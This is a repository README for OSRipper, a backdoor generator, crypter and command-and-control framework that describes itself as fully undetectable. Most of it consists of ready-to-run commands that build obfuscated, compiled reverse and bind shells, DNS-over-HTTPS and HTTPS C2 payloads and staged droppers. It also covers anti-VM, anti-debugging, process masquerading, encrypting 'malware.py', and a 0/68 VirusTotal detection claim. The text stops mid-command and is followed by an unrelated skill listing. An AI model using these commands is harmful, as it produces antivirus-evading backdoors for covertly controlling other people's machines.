OSRipper
AV evading cross platform Backdoor and Crypter Framework with a integrated lightweight webUI
Install / Use
/learn @NoahOksuz/OSRipperREADME
OSRipper v0.4.2
<div align="center">
Advanced cross-platform payload generator and crypter with FUD capabilities
Features • Quick Start • Web UI • Payload Types • Documentation
</div>Overview
OSRipper is a sophisticated, fully undetectable (FUD) backdoor generator and crypter designed for authorized penetration testing and red team operations. It features advanced evasion techniques, multiple payload types, and a modern web-based C2 interface for managing compromised systems.
Key Highlights
- Fully Undetectable (FUD) - Advanced evasion techniques bypass modern AV solutions
- Web-Based C2 Interface - Modern dashboard for managing active sessions
- Multiple Payload Types - Bind shells, reverse shells, DoH C2, HTTPS C2, and more
- Multi-Layer Obfuscation - Standard and enhanced obfuscation with randomized variables
- Binary Compilation - Compile payloads to standalone executables
- Encrypted Communications - SSL/TLS and certificate-pinned HTTPS C2 channels
- Stealth Features - VM detection, anti-debugging, process masquerading
Features
Payload Generation
| Payload Type | Description | Use Case | |-------------|-------------|----------| | Bind Shell | Opens port on victim machine | Direct access when reverse connections blocked | | Reverse TCP Meterpreter | SSL/TLS encrypted reverse connection | Standard penetration testing | | DNS-over-HTTPS C2 | Stealthy DoH-based command & control | Bypass network restrictions | | HTTPS C2 | Certificate-pinned HTTPS C2 | Secure, authenticated C2 channel | | Staged Payload | Multi-stage web delivery | Enhanced stealth deployment | | Custom Code Crypter | Obfuscate any Python script | Custom payload encryption |
Evasion Techniques
- Advanced Obfuscation - Multi-layer code encoding with random variables
- Enhanced Obfuscation - Anti-debug, VM detection, junk code injection
- Anti-VM Detection - Sandbox and virtual machine evasion
- Stealth Delays - Random startup delays (5-15 seconds)
- Process Masquerading - Disguise as legitimate system processes
- Signature Randomization - Every payload is unique
Web UI Features
- Session Dashboard - View all active C2 sessions
- Interactive Terminal - Execute commands via web interface
- Payload Generator - Generate payloads directly from web UI
- Session Management - View system info, command history, and manage sessions
- Real-time Updates - Live command execution and response viewing
Advanced Capabilities
- Ngrok Integration - Automatic tunnel creation for dynamic IPs
- Certificate Pinning - Secure HTTPS C2 with certificate validation
- Session Persistence - Maintain connections across restarts
- Command Queueing - Queue commands for offline agents
- Response Parsing - Automatic parsing of command output
Quick Start
Installation
# Clone repository
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Install dependencies
pip3 install -r requirements.txt
# Install package
pip3 install -e .
Important — run setup for optional features (ngrok, binary compilation):
On many systems (especially Linux with an externally-managed Python environment), you must run the built-in setup so optional dependencies are installed into OSRipper’s own venv. Do this once after installation:
osripper-cli setup
This creates ~/.local/share/osripper/venv, installs pyngrok, nuitka, and sandboxed there, and all later runs of osripper / osripper-cli will use them automatically. Without this, --ngrok and --compile will prompt you to run setup. Use osripper-cli setup --system only if you prefer a system/user pip install instead of the venv.
Basic Usage
Interactive Mode:
osripper
# or
python3 -m osripper
Command Line:
# Generate reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# Generate DoH C2 payload
osripper-cli doh -d example.com --obfuscate --compile
Web UI:
# Start C2 server with web UI
python -m osripper.c2.server example.com --port 5000
# Access dashboard at http://localhost:5000
Web UI
OSRipper includes a modern web-based C2 interface for managing compromised systems.
Features
- Dashboard - Overview of all active sessions
- Session Management - View system information and execute commands
- Payload Generator - Generate DoH and HTTPS payloads via web interface
- Command History - Track all executed commands and responses
- Real-time Updates - Live command execution and response viewing
Starting the C2 Server
# Basic usage
python -m osripper.c2.server example.com
# With HTTPS
python -m osripper.c2.server example.com --https
# Custom port
python -m osripper.c2.server example.com --port 8080
# With custom certificate
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
Accessing the Web UI
Once the server is running, access the dashboard at:
- HTTP:
http://localhost:5000 - HTTPS:
https://localhost:5000(if enabled)
Payload Types
1. Bind Shell Backdoor
Opens a port on the victim machine and waits for connections.
osripper-cli bind -p 4444 --obfuscate --compile
Connection:
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
2. Reverse TCP Meterpreter
Encrypted reverse connection with SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
3. DNS-over-HTTPS C2
Stealthy C2 channel using DNS-over-HTTPS protocol. Bypasses many network restrictions.
# Generate payload
osripper-cli doh -d example.com --obfuscate --compile
# Start C2 server
python -m osripper.c2.server example.com
Features:
- Stealthy DNS-based communication
- Web UI for session management
- Automatic session persistence
- Command queueing for offline agents
4. HTTPS C2 (Certificate Pinning)
Secure HTTPS C2 with certificate pinning for authentication.
# Generate payload (via web UI or CLI)
# Start C2 server with HTTPS
python -m osripper.c2.server example.com --https
# Get certificate fingerprint
curl http://localhost:5000/api/cert-fingerprint
Features:
- Certificate pinning for security
- Encrypted HTTPS communication
- Web UI integration
- Session management
5. Staged Payload
Multi-stage web delivery for enhanced stealth.
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate
6. Custom Code Crypter
Obfuscate and encrypt any Python script.
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile
Command Line Interface
Common Options
| Option | Description |
|-------|-------------|
| --obfuscate | Enable multi-layer obfuscation |
| --enhanced | Enhanced obfuscation (anti-debug, VM detection) |
| --compile | Compile to standalone binary |
| --icon PATH | Custom icon for compiled binary |
| --delay | Add random startup delay (5-15 seconds) |
| --output, -o NAME | Output filename |
| --quiet, -q | Quiet mode (minimal output) |
Examples
# Full-featured reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--obfuscate --enhanced --compile --icon app.ico --delay
# DoH C2 with all features
osripper-cli doh -d example.com \
--obfuscate --enhanced --compile --delay
# Custom script encryption
osripper-cli custom --script malware.py \
--obfuscate --enhanced --compile
# Using ngrok for dynamic IP
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile
Detection Results
Latest VirusTotal Scans
- Python Payload: 0/68 Detection Rate
- Compiled Binary: 0/68 Detection Rate
antiscan result
Architecture
┌─────────────────┐
│ Generated │
│ Binary │
└─────────────────┘
│
│ Execute
▼
┌──────────────────┐
│ Obfuscated │
│ Dropper │
└──────────────────┘
│
│ HTTP/HTTPS/DoH
▼
┌─────────────────┐
│ │
│ C2 SERVER │
│ (Web UI) │
│ │
└─────────────────┘
│
│ Command/Response
▼
┌─────────────────┐
│ Agent │
│ Execution │
└─────────────────┘
Screenshots
Main Interface
Web UI Dashboard
Advanced Configuration
Ngrok Integration
# Generate payload with ngrok
osripper-cli reverse --ngrok -p 4444
# Follow prompts to set up tunnel
# Run: ngrok tcp 4444
Custom Icons
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--compile --icon /path/to/icon.ico
Obfuscation Levels
Standard Obfuscation:
- Multi-layer encoding
- Variable randomization
- Code structure obfuscation
Enhanced Obfuscation:
- All standard features
- Anti-debugging techniques
- VM detection
- Junk code injection
- Advanced evasion
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
# Enhanced
os
Related Skills
node-connect
349.2kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
claude-opus-4-5-migration
109.5kMigrate prompts and code from Claude Sonnet 4.0, Sonnet 4.5, or Opus 4.1 to Opus 4.5
frontend-design
109.5kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
model-usage
349.2kUse CodexBar CLI local cost usage to summarize per-model usage for Codex or Claude, including the current (most recent) model or a full model breakdown. Trigger when asked for model-level usage/cost data from codexbar, or when you need a scriptable per-model summary from codexbar cost JSON.
